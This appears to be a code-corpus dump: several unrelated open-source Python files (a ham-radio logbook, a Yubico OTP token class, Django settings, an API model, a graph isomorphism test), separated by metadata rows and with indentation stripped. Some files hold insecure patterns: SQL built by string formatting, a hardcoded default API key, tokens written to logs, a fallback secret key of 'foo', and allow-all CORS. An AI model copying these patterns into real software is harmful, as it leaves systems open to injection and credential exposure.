match = re.match(r'\s*Basic\s*(?P<auth>\S*)$', inHeader)
if match is not None and match.group('auth') == base64string:
return True
raise UnauthorizedException(message + " Header:" + str(request.headers))
except:
raise UnauthorizedException(message + " Header:" + str(request.headers))
def buildTokenCache(authztoken):
""" build in memory cache for security tokens """
# find all pub keys in agent and encrypt the security token with them
appGlobal = config['pylons.app_globals']
pubKeyDir = os.path.join(manifestutil.manifestPath('agent'), 'agent', 'cronus', 'keys')
LOG.info('key directory %s' % pubKeyDir)
if os.path.exists(pubKeyDir):
try:
import pki
from M2Crypto import X509
pubKeyFiles = [f for f in os.listdir(pubKeyDir) if re.match(r'.*\.cert', f)]
LOG.info('key files %s' % pubKeyFiles)
for pubKeyFile in pubKeyFiles:
# reload the certs from disk
certf = open(os.path.join(pubKeyDir, pubKeyFile), 'r')
ca_cert_content = certf.read()
certf.close()
cert = X509.load_cert_string(ca_cert_content)
# pub = RSA.load_pub_key(os.path.join(pubKeyDir, pubKeyFile))
encryptedToken = pki.encrypt(cert.get_pubkey(), authztoken)
appGlobal.encryptedtokens[pubKeyFile] = encryptedToken
LOG.info('token %s=%s' % (pubKeyFile, encryptedToken))
except BaseException as excep:
LOG.error('Error loading pki keys %s - %s' % (str(excep), traceback.format_exc(2)))
| apache-2.0 | -3,431,015,109,863,174,000 | 37.895833 | 124 | 0.601964 | false | 4.505229 | true | false | false |
ctjacobs/pyqso | pyqso/log.py | 1 | 15133 | #!/usr/bin/env python3
# Copyright (C) 2013-2017 Christian Thomas Jacobs.
# This file is part of PyQSO.
# PyQSO is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PyQSO is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with PyQSO. If not, see <http://www.gnu.org/licenses/>.
from gi.repository import Gtk
import logging
import sqlite3 as sqlite
from pyqso.adif import AVAILABLE_FIELD_NAMES_ORDERED
class Log(Gtk.ListStore):
""" A single log inside of the whole logbook. A Log object can store multiple records. This is """
def __init__(self, connection, name):
""" Set up a new Log object.
:arg connection: An sqlite database connection.
:arg str name: The name of the log (i.e. the database table name).
"""
# The ListStore constructor needs to know the data types of the columns.
# The index is always an integer. We will assume the fields are strings.
data_types = [int] + [str]*len(AVAILABLE_FIELD_NAMES_ORDERED)
# Call the constructor of the super class (Gtk.ListStore).
Gtk.ListStore.__init__(self, *data_types)
self.connection = connection
self.name = name
return
def populate(self):
""" Remove everything in the Gtk.ListStore that is rendered already (via the TreeView), and start afresh. """
logging.debug("Populating '%s'..." % self.name)
self.add_missing_db_columns()
self.clear()
try:
records = self.records
for r in records:
liststore_entry = [r["id"]]
for field_name in AVAILABLE_FIELD_NAMES_ORDERED:
# Note: r may contain column names that are not in AVAILABLE_FIELD_NAMES_ORDERED,
# so we need to loop over and only select those that are, since the ListStore will
# expect a specific number of columns.
liststore_entry.append(r[field_name])
self.append(liststore_entry)
logging.debug("Finished populating '%s'." % self.name)
except sqlite.Error as e:
logging.error("Could not populate '%s' because of a database error." % self.name)
logging.exception(e)
return
def add_missing_db_columns(self):
""" Check whether each field name in AVAILABLE_FIELD_NAMES_ORDERED is in the database table. If not, add it
(with all entries being set to an empty string initially).
:raises sqlite.Error, IndexError: If the existing database column names could not be obtained, or missing column names could not be added.
"""
logging.debug("Adding any missing database columns...")
# Get all the column names in the current database table.
column_names = []
try:
with self.connection:
c = self.connection.cursor()
c.execute("PRAGMA table_info(%s)" % self.name)
result = c.fetchall()
for t in result:
column_names.append(t[1].upper())
except (sqlite.Error, IndexError) as e:
logging.exception(e)
logging.error("Could not obtain the database column names.")
return
for field_name in AVAILABLE_FIELD_NAMES_ORDERED:
if(not(field_name in column_names)):
try:
with self.connection:
c.execute("ALTER TABLE %s ADD COLUMN %s TEXT DEFAULT \"\"" % (self.name, field_name.lower()))
except sqlite.Error as e:
logging.exception(e)
logging.error("Could not add the missing database column '%s'." % field_name)
pass
logging.debug("Finished adding any missing database columns.")
return
def add_record(self, fields_and_data):
""" Add a record (or multiple records) to the log.
:arg fields_and_data: A list of dictionaries (or possibly just a single dictionary), with each dictionary representing a single QSO, to be added to the log.
"""
logging.debug("Adding record(s) to log...")
# If a dictionary is given, assume that we only have one record to add.
if isinstance(fields_and_data, dict):
fields_and_data = [fields_and_data]
with self.connection:
c = self.connection.cursor()
# Get all the column names in the current database table.
c.execute("PRAGMA table_info(%s)" % self.name)
column_names = c.fetchall()
# Get the index/rowid of the last inserted record in the database.
c.execute("SELECT max(id) FROM %s" % self.name)
last_index = c.fetchone()[0]
if last_index is None:
# Assume no records are currently present.
last_index = 0
# A list of all the database entries, to be inserted in one go into the database.
database_entries = []
# Construct the SQL query.
query = "INSERT INTO %s VALUES (NULL" % self.name
for i in range(len(column_names)-1): # -1 here because we don't want to count the database's 'id' column, since this is autoincremented.
query = query + ",?"
query = query + ")"
# Gather all the records (making sure that the entries of each record are in the correct order).
for r in range(len(fields_and_data)):
# What if the database columns are not necessarily in the same order as (or even exist in) AVAILABLE_FIELD_NAMES_ORDERED?
# PyQSO handles this here, but needs a separate list (called database_entry) to successfully perform the SQL query.
database_entry = []
for t in column_names:
column_name = str(t[1]) # 't' here is a tuple
if((column_name.upper() in AVAILABLE_FIELD_NAMES_ORDERED) and (column_name.upper() in list(fields_and_data[r].keys()))):
database_entry.append(fields_and_data[r][column_name.upper()])
else:
if(column_name != "id"): # Ignore the index/rowid field. This is a special case since it's not in AVAILABLE_FIELD_NAMES_ORDERED.
database_entry.append("")
database_entries.append(database_entry)
# Insert records in the database.
with self.connection:
c = self.connection.cursor()
c.executemany(query, database_entries)
# Get the indices/rowids of the newly-inserted records.
query = "SELECT id FROM %s WHERE id > %s ORDER BY id ASC" % (self.name, last_index)
c.execute(query)
inserted = c.fetchall()
# Check that the number of records we wanted to insert is the same as the number of records successfully inserted.
assert(len(inserted) == len(database_entries))
# Add the records to the ListStore as well.
for r in range(len(fields_and_data)):
liststore_entry = [inserted[r]["id"]] # Add the record's index.
field_names = AVAILABLE_FIELD_NAMES_ORDERED
for i in range(0, len(field_names)):
if(field_names[i] in list(fields_and_data[r].keys())):
liststore_entry.append(fields_and_data[r][field_names[i]])
else:
liststore_entry.append("")
self.append(liststore_entry)
logging.debug("Successfully added the record(s) to the log.")
return
def delete_record(self, index, iter=None):
""" Delete a specified record from the log. The corresponding record is also deleted from the Gtk.ListStore data structure.
:arg int index: The index of the record in the SQL database.
:arg iter: The iterator pointing to the record to be deleted in the Gtk.ListStore. If the default value of None is used, only the database entry is deleted and the corresponding Gtk.ListStore is left alone.
:raises sqlite.Error, IndexError: If the record could not be deleted.
"""
logging.debug("Deleting record from log...")
# Delete the selected row in database.
with self.connection:
c = self.connection.cursor()
query = "DELETE FROM %s" % self.name
c.execute(query+" WHERE id=?", [index])
# Delete the selected row in the Gtk.ListStore.
if(iter is not None):
self.remove(iter)
logging.debug("Successfully deleted the record from the log.")
return
def edit_record(self, index, field_name, data, iter=None, column_index=None):
""" Edit a specified record by replacing the current data in a specified field with the data provided.
:arg int index: The index of the record in the SQL database.
:arg str field_name: The name of the field whose data should be modified.
:arg str data: The data that should replace the current data in the field.
:arg iter: The iterator pointing to the record to be edited in the Gtk.ListStore. If the default value of None is used, only the database entry is edited and the corresponding Gtk.ListStore is left alone.
:arg column_index: The index of the column in the Gtk.ListStore to be edited. If the default value of None is used, only the database entry is edited and the corresponding Gtk.ListStore is left alone.
:raises sqlite.Error, IndexError: If the record could not be edited.
"""
logging.debug("Editing field '%s' in record %d..." % (field_name, index))
with self.connection:
c = self.connection.cursor()
query = "UPDATE %s SET %s" % (self.name, field_name)
query = query + "=? WHERE id=?"
c.execute(query, [data, index]) # First update the SQL database...
if(iter is not None and column_index is not None):
self.set(iter, column_index, data) # ...and then the ListStore.
logging.debug("Successfully edited field '%s' in record %d in the log." % (field_name, index))
return
def remove_duplicates(self):
""" Remove any duplicate records from the log.
:returns: The total number of duplicates, and the number of duplicates that were successfully removed. Hopefully these will be the same.
:rtype: tuple
"""
duplicates = self.get_duplicates()
if(len(duplicates) == 0):
return (0, 0) # Nothing to do here.
removed = 0 # Count the number of records that are removed. Hopefully this will be the same as len(duplicates).
iter = self.get_iter_first() # Start with the first row in the log.
prev = iter # Keep track of the previous iter (initially this will be the same as the first row in the log).
while iter is not None:
row_index = self.get_value(iter, 0) # Get the index.
if(row_index in duplicates): # Is this a duplicate row? If so, delete it.
self.delete_record(row_index, iter)
removed += 1
iter = prev # Go back to the iter before the record that was just removed and continue from there.
continue
prev = iter
iter = self.iter_next(iter) # Move on to the next row, until iter_next returns None.
return (len(duplicates), removed)
def rename(self, new_name):
""" Rename the log.
:arg str new_name: The new name for the log.
:returns: True if the renaming process is successful. Otherwise returns False.
:rtype: bool
"""
try:
with self.connection:
# First try to alter the table name in the database.
c = self.connection.cursor()
query = "ALTER TABLE %s RENAME TO %s" % (self.name, new_name)
c.execute(query)
# If the table name change was successful, then change the name attribute of the Log object too.
self.name = new_name
success = True
except sqlite.Error as e:
logging.exception(e)
success = False
return success
def get_duplicates(self):
""" Find the duplicates in the log, based on the CALL, QSO_DATE, and TIME_ON fields.
:returns: A list of indices/ids corresponding to the duplicate records.
:rtype: list
"""
duplicates = []
try:
with self.connection:
c = self.connection.cursor()
c.execute(
"""SELECT id FROM %s WHERE id NOT IN
(
SELECT MIN(id) FROM %s GROUP BY call, qso_date, time_on
)""" % (self.name, self.name))
result = c.fetchall()
for index in result:
duplicates.append(index[0]) # Get the integer from inside the tuple.
duplicates.sort() # These indices should monotonically increasing, but let's sort the list just in case.
except (sqlite.Error, IndexError) as e:
logging.exception(e)
return duplicates
def get_record_by_index(self, index):
""" Return a record with a given index in the log.
:arg int index: The index of the record in the SQL database.
:returns: The desired record, represented by a dictionary of field-value pairs.
:rtype: dict
:raises sqlite.Error: If the record could not be retrieved from the database.
"""
with self.connection:
c = self.connection.cursor()
query = "SELECT * FROM %s WHERE id=?" % self.name
c.execute(query, [index])
return c.fetchone()
@property
def records(self):
""" Return a list of all the records in the log.
:returns: A list of all the records in the log. Each record is represented by a dictionary.
:rtype: dict
:raises sqlite.Error: If the records could not be retrieved from the database.
"""
with self.connection:
c = self.connection.cursor()
c.execute("SELECT * FROM %s" % self.name)
return c.fetchall()
@property
def record_count(self):
""" Return the total number of records in the log.
:returns: The total number of records in the log.
:rtype: int
:raises sqlite.Error: If the record count could not be determined due to a database error.
"""
with self.connection:
c = self.connection.cursor()
c.execute("SELECT Count(*) FROM %s" % self.name)
return c.fetchone()[0]
| gpl-3.0 | -7,163,945,879,374,536,000 | 44.308383 | 214 | 0.606489 | false | 4.297927 | false | false | false |
jalr/privacyidea | privacyidea/lib/tokens/yubicotoken.py | 1 | 7718 | # -*- coding: utf-8 -*-
#
# privacyIDEA is a fork of LinOTP
# May 08, 2014 Cornelius Kölbel
# License: AGPLv3
# contact: http://www.privacyidea.org
#
# 2016-04-04 Cornelius Kölbel <[email protected]>
# Use central yubico_api_signature function
# 2015-01-28 Rewrite during flask migration
# Change to use requests module
# Cornelius Kölbel <[email protected]>
#
#
# Copyright (C) 2010 - 2014 LSE Leading Security Experts GmbH
# License: LSE
# contact: http://www.linotp.org
# http://www.lsexperts.de
# [email protected]
#
# This code is free software; you can redistribute it and/or
# modify it under the terms of the GNU AFFERO GENERAL PUBLIC LICENSE
# License as published by the Free Software Foundation; either
# version 3 of the License, or any later version.
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU AFFERO GENERAL PUBLIC LICENSE for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see <http://www.gnu.org/licenses/>.
#
__doc__ = """
This is the implementation of the yubico token type.
Authentication requests are forwarded to the Yubico Cloud service YubiCloud.
The code is tested in tests/test_lib_tokens_yubico
"""
import logging
from privacyidea.lib.decorators import check_token_locked
import traceback
import requests
from privacyidea.api.lib.utils import getParam
from privacyidea.lib.config import get_from_config
from privacyidea.lib.log import log_with
from privacyidea.lib.tokenclass import TokenClass
from privacyidea.lib.tokens.yubikeytoken import (yubico_check_api_signature,
yubico_api_signature)
import os
import binascii
YUBICO_LEN_ID = 12
YUBICO_LEN_OTP = 44
YUBICO_URL = "https://api.yubico.com/wsapi/2.0/verify"
DEFAULT_CLIENT_ID = 20771
DEFAULT_API_KEY = "9iE9DRkPHQDJbAFFC31/dum5I54="
optional = True
required = False
log = logging.getLogger(__name__)
class YubicoTokenClass(TokenClass):
def __init__(self, db_token):
TokenClass.__init__(self, db_token)
self.set_type(u"yubico")
self.tokenid = ""
@staticmethod
def get_class_type():
return "yubico"
@staticmethod
def get_class_prefix():
return "UBCM"
@staticmethod
@log_with(log)
def get_class_info(key=None, ret='all'):
"""
:param key: subsection identifier
:type key: string
:param ret: default return value, if nothing is found
:type ret: user defined
:return: subsection if key exists or user defined
:rtype: dict or string
"""
res = {'type': 'yubico',
'title': 'Yubico Token',
'description': 'Yubikey Cloud mode: Forward authentication '
'request to YubiCloud.',
'init': {'page': {'html': 'yubicotoken.mako',
'scope': 'enroll', },
'title': {'html': 'yubicotoken.mako',
'scope': 'enroll.title'}
},
'config': {'page': {'html': 'yubicotoken.mako',
'scope': 'config'},
'title': {'html': 'yubicotoken.mako',
'scope': 'config.title'}
},
'user': ['enroll'],
# This tokentype is enrollable in the UI for...
'ui_enroll': ["admin", "user"],
'policy' : {},
}
if key is not None and key in res:
ret = res.get(key)
else:
if ret == 'all':
ret = res
return ret
def update(self, param):
tokenid = getParam(param, "yubico.tokenid", required)
if len(tokenid) < YUBICO_LEN_ID:
log.error("The tokenid needs to be {0:d} characters long!".format(YUBICO_LEN_ID))
raise Exception("The Yubikey token ID needs to be {0:d} characters long!".format(YUBICO_LEN_ID))
if len(tokenid) > YUBICO_LEN_ID:
tokenid = tokenid[:YUBICO_LEN_ID]
self.tokenid = tokenid
# overwrite the maybe wrong lenght given at the command line
param['otplen'] = 44
TokenClass.update(self, param)
self.add_tokeninfo("yubico.tokenid", self.tokenid)
@log_with(log)
@check_token_locked
def check_otp(self, anOtpVal, counter=None, window=None, options=None):
"""
Here we contact the Yubico Cloud server to validate the OtpVal.
"""
res = -1
apiId = get_from_config("yubico.id", DEFAULT_CLIENT_ID)
apiKey = get_from_config("yubico.secret", DEFAULT_API_KEY)
yubico_url = get_from_config("yubico.url", YUBICO_URL)
if apiKey == DEFAULT_API_KEY or apiId == DEFAULT_CLIENT_ID:
log.warning("Usage of default apiKey or apiId not recommended!")
log.warning("Please register your own apiKey and apiId at "
"yubico website!")
log.warning("Configure of apiKey and apiId at the "
"privacyidea manage config menu!")
tokenid = self.get_tokeninfo("yubico.tokenid")
if len(anOtpVal) < 12:
log.warning("The otpval is too short: {0!r}".format(anOtpVal))
elif anOtpVal[:12] != tokenid:
log.warning("The tokenid in the OTP value does not match "
"the assigned token!")
else:
nonce = binascii.hexlify(os.urandom(20))
p = {'nonce': nonce,
'otp': anOtpVal,
'id': apiId}
# Also send the signature to the yubico server
p["h"] = yubico_api_signature(p, apiKey)
try:
r = requests.post(yubico_url,
data=p)
if r.status_code == requests.codes.ok:
response = r.text
elements = response.split()
data = {}
for elem in elements:
k, v = elem.split("=", 1)
data[k] = v
result = data.get("status")
return_nonce = data.get("nonce")
# check signature:
signature_valid = yubico_check_api_signature(data, apiKey)
                    if not signature_valid:
log.error("The hash of the return from the Yubico "
"Cloud server does not match the data!")
if nonce != return_nonce:
log.error("The returned nonce does not match "
"the sent nonce!")
if result == "OK":
res = 1
if nonce != return_nonce or not signature_valid:
log.warning("Nonce and Hash do not match.")
res = -2
else:
# possible results are listed here:
# https://github.com/Yubico/yubikey-val/wiki/ValidationProtocolV20
log.warning("failed with {0!r}".format(result))
except Exception as ex:
log.error("Error getting response from Yubico Cloud Server"
" (%r): %r" % (yubico_url, ex))
log.debug("{0!s}".format(traceback.format_exc()))
return res
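    # For reference (illustrative only, derived from the parsing above): the
    # YubiCloud reply is consumed as whitespace-separated key=value pairs, e.g.
    #   "h=<signature> otp=<otp> nonce=<nonce> status=OK"
    # and only the status, nonce and h fields are actually checked by check_otp().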
| agpl-3.0 | -2,784,637,375,835,404,300 | 36.818627 | 108 | 0.552301 | false | 3.882738 | true | false | false |
cachance7/BattleQuip | battlequip/util.py | 1 | 2470 | import collections
import re
def namedtuple_with_defaults(typename, field_names, default_values=[]):
T = collections.namedtuple(typename, field_names)
T.__new__.__defaults__ = (None,) * len(T._fields)
if isinstance(default_values, collections.Mapping):
prototype = T(**default_values)
else:
prototype = T(*default_values)
T.__new__.__defaults__ = tuple(prototype)
return T
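# Example behaviour (worked out from the helper above): unspecified fields default
# to None unless explicit defaults are given.
#   Point = namedtuple_with_defaults('Point', ['x', 'y'], [0, 0])
#   Point()   -> Point(x=0, y=0)
#   Point(3)  -> Point(x=3, y=0)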
# Immutable battleship coordinate class
def _coord_as_string(self):
return chr(self.row + 65) + str(self.col + 1)
Coord = namedtuple_with_defaults('Coord', ['row', 'col'])
Coord.__str__ = _coord_as_string
Status = namedtuple_with_defaults('Status', ['game_status', 'my_turn'])
Attack = namedtuple_with_defaults('Attack', ['coord', 'hit', 'sunk'])
class InvalidCoordException(Exception):
def __init__(self, message):
super(InvalidCoordException, self).__init__()
self.message = message
class InvalidPositionException(Exception):
def __init__(self, message):
super(InvalidPositionException, self).__init__()
self.message = message
def make_coord(*raw_coord):
if len(raw_coord) == 1:
return _make_coord(raw_coord[0])
elif len(raw_coord) == 2:
return _make_coord(raw_coord)
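# Accepted spellings (all equivalent; Coord is zero-based (row, col)):
#   make_coord('B3')    -> Coord(row=1, col=2)
#   make_coord('B', 3)  -> Coord(row=1, col=2)
#   make_coord((1, 2))  -> Coord(row=1, col=2)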
def _make_coord(raw_coord):
if isinstance(raw_coord, Coord):
return raw_coord
elif isinstance(raw_coord, tuple):
# coord tuple must correspond to zero-based matrix (row, column)
if len(raw_coord) < 2:
raise InvalidCoordException("coord tuple must have 2 elements")
elif isinstance(raw_coord[0], str):
return make_coord(raw_coord[0] + str(raw_coord[1]))
return Coord(raw_coord[0], raw_coord[1])
elif isinstance(raw_coord, str):
# coord string is alpha & 1-based like 'B3' or 'c10'
if len(raw_coord) < 2:
raise InvalidCoordException("coord string must have 2+ elements")
row = raw_coord[0]
col = raw_coord[1:]
if re.match('[a-zA-Z]', row):
row = ord(row.upper()) - 65
else:
raise InvalidCoordException("coord elm 1 must be one alpha char")
try:
col = int(col) - 1
if col < 0:
                raise ValueError
except:
raise InvalidCoordException("coord elm 2 must be column number >= 1")
return Coord(row, col)
else:
raise InvalidCoordException("Invalid format: " + type(raw_coord))
| mit | -7,643,095,019,502,245,000 | 33.305556 | 81 | 0.615385 | false | 3.736762 | false | false | false |
m16Takahiro/kakeibo | kakeibo/settings.py | 1 | 3863 | """
Django settings for kakeibo project.
Generated by 'django-admin startproject' using Django 1.11.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
import json
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
try:
with open(BASE_DIR + '/config/secret.json', 'r') as jsonfile:
dict_ = json.load(jsonfile)
SECRET_KEY = dict_['secret_key']
except FileNotFoundError:
print('安全でないキーを使用します。長期的な稼働は控えてください。')
SECRET_KEY = 'foo'
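# The file read above is config/secret.json under BASE_DIR; an illustrative layout
# only (the actual value is whatever secret key you provide):
#   {"secret_key": "<random Django SECRET_KEY string>"}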
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['127.0.0.1', 'localhost']
# Application definition
INSTALLED_APPS = [
'out_view',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'kakeibo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'kakeibo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'ja-jp'
TIME_ZONE = 'Asia/Tokyo'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = BASE_DIR + '/static/'
LOGIN_URL = '/admin/login/'
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
CORS_ALLOW_CREDENTIALS = True
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
CSRF_TRUSTED_ORIGINS = ['lifelog.515hikaru.net']
CORS_REPLACE_HTTPS_REFERER = True
CSRF_COOKIE_DOMAIN = 'lifelog.515hikaru.net'
CORS_ORIGIN_WHITELIST = ('https://lifelog.515hikaru.net',
'lifelog.515hikaru.net', '515hikaru.net', )
| mit | -4,153,100,942,513,246,700 | 25.985816 | 91 | 0.684363 | false | 3.297227 | false | false | false |
ltowarek/budget-supervisor | third_party/saltedge/swagger_client/models/removed_customer_response_data.py | 1 | 3772 | # coding: utf-8
"""
Salt Edge Account Information API
API Reference for services # noqa: E501
OpenAPI spec version: 5.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class RemovedCustomerResponseData(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'deleted': 'bool',
'id': 'int'
}
attribute_map = {
'deleted': 'deleted',
'id': 'id'
}
def __init__(self, deleted=True, id=None): # noqa: E501
"""RemovedCustomerResponseData - a model defined in Swagger""" # noqa: E501
self._deleted = None
self._id = None
self.discriminator = None
if deleted is not None:
self.deleted = deleted
if id is not None:
self.id = id
@property
def deleted(self):
"""Gets the deleted of this RemovedCustomerResponseData. # noqa: E501
:return: The deleted of this RemovedCustomerResponseData. # noqa: E501
:rtype: bool
"""
return self._deleted
@deleted.setter
def deleted(self, deleted):
"""Sets the deleted of this RemovedCustomerResponseData.
:param deleted: The deleted of this RemovedCustomerResponseData. # noqa: E501
:type: bool
"""
self._deleted = deleted
@property
def id(self):
"""Gets the id of this RemovedCustomerResponseData. # noqa: E501
:return: The id of this RemovedCustomerResponseData. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this RemovedCustomerResponseData.
:param id: The id of this RemovedCustomerResponseData. # noqa: E501
:type: int
"""
self._id = id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(RemovedCustomerResponseData, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RemovedCustomerResponseData):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| mit | -6,301,179,382,600,332,000 | 26.735294 | 86 | 0.552227 | false | 4.24297 | false | false | false |
iofun/spider | spider/system/campaigns.py | 1 | 5125 | # -*- coding: utf-8 -*-
'''
Spider campaigns system logic.
'''
# This file is part of spider.
# Distributed under the terms of the last AGPL License.
# The full license is in the file LICENCE, distributed as part of this software.
__author__ = 'Team Machine'
import arrow
import motor
import uuid
import logging
from tornado import gen
from spider.messages import campaigns
#from spider.messages import inbound
from spider.tools import clean_structure, clean_results
class Campaigns(object):
'''
Spider campaigns
'''
@gen.coroutine
def get_campaign_list(self, account, status, page_num):
'''
Get campaign list
'''
page_num = int(page_num)
page_size = self.settings.get('page_size')
campaign_list = []
find_query = {'account':account}
logging.info(status)
if status != 'all':
find_query['status'] = status
query = self.db.campaigns.find(find_query, {'_id':0})
q = query.sort([('_id', -1)]).skip(int(page_num) * page_size).limit(page_size)
try:
            while (yield q.fetch_next):
campaign = q.next_object()
campaign_list.append(campaign)
except Exception, e:
logging.exception(e)
raise gen.Return(e)
finally:
raise gen.Return(campaign_list)
@gen.coroutine
def get_campaign(self, account, campaign_uuid):
'''
Get campaign
'''
message = None
try:
result = yield self.db.campaigns.find_one(
{
'account':account,
'uuid':campaign_uuid},
{'_id':0}
)
if result:
campaign = campaigns.Campaign(result)
campaign.validate()
message = clean_structure(campaign)
except Exception, e:
logging.exception(e)
raise e
finally:
raise gen.Return(message)
@gen.coroutine
def new_campaign(self, struct):
'''
New campaign
'''
try:
campaign = campaigns.Campaign(struct)
campaign.validate()
campaign = clean_structure(campaign)
except Exception, e:
logging.error(e)
raise e
try:
result = yield self.db.campaigns.insert(campaign)
message = campaign.get('uuid')
except Exception, e:
logging.error(e)
message = str(e)
raise gen.Return(message)
@gen.coroutine
def modify_campaign(self, account, campaign_uuid, struct):
'''
Modify campaign
'''
try:
campaign = campaigns.ModifyCampaign(struct)
campaign.validate()
campaign = clean_structure(campaign)
except Exception, e:
logging.error(e)
raise e
logging.error(campaign)
try:
result = yield self.db.campaigns.update(
{'account':account,
'uuid':campaign_uuid},
{'$set':campaign}
)
logging.info(result)
except Exception, e:
logging.error(e)
message = str(e)
raise gen.Return(bool(result.get('n')))
@gen.coroutine
def replace_campaign(self, account, campaign_uuid, struct):
'''
Replace campaign
'''
try:
campaign = campaigns.Campaign(struct)
campaign.validate()
campaign = clean_structure(campaign)
except Exception, e:
logging.error(e)
raise e
try:
result = yield self.db.campaigns.update(
{'account':account,
'uuid':campaign_uuid},
{'$set':campaign}
)
logging.info(result)
except Exception, e:
logging.error(e)
message = str(e)
raise gen.Return(bool(result.get('n')))
@gen.coroutine
def remove_campaign(self, account, campaign_uuid):
'''
Remove campaign
'''
message = None
try:
message = yield self.db.campaigns.remove(
{'account':account, 'uuid':campaign_uuid}
)
except Exception, e:
logging.error(e)
message = str(e)
raise gen.Return(bool(message.get('n')))
# check_exist needs some testing.
@gen.coroutine
def check_exist(self, campaign_uuid):
'''
Check if a given campaign exist
'''
try:
exist = yield self.db.campaigns.find_one(
{'uuid': campaign_uuid},
{'uuid':1,
'name':1,
'_id':0})
exist = (True if exist else False)
except Exception, e:
logging.error(e)
message = str(e)
raise gen.Return(exist) | agpl-3.0 | 1,334,203,877,906,721,300 | 24.758794 | 86 | 0.50478 | false | 4.472077 | false | false | false |
dksr/graph_utils | weisfeiler_lehman_graph_isomorphism_test.py | 1 | 1864 | from igraph import Graph
def weisfeiler_lehman_graph_isomorphism_test(G1,G2):
""" Performs the Weisfeiler-Lehman test of Isomorphism:
Weisfeiler and Lehman: A reduction of a graph to a canonical form
and an algebra arising during this reduction,
Nauchno-Technicheskaya Informatsiya, Ser. 2, no. 9 (1968), 12-16 (in Russian).
I used this paper to implement the algorithm:
Nino Shervashidze et.al.: Weisfeiler-Lehman Graph Kernels, Journal of Machine Learning Research (2011)
"""
name_codes = {}
MAX_ITRES = 2
node_count = 0
compressed_labels = {}
for h in range(MAX_ITRES):
multi_set_labels = {}
for g in [G1, G2]:
multi_set_labels[g['name']] = {}
for node in g.vs:
neighbours = g.neighbors(node)
lables = g.vs[neighbours]['name']
lables.sort()
new_node_name = node['name'] + '_'.join(lables)
multi_set_labels[g['name']][node.index] = new_node_name
if new_node_name not in compressed_labels:
compressed_labels[new_node_name] = 'c' + repr(node_count)
print new_node_name, compressed_labels[new_node_name]
node_count += 1
for g in [G1, G2]:
for node in g.vs:
node['name'] = compressed_labels[multi_set_labels[g['name']][node.index]]
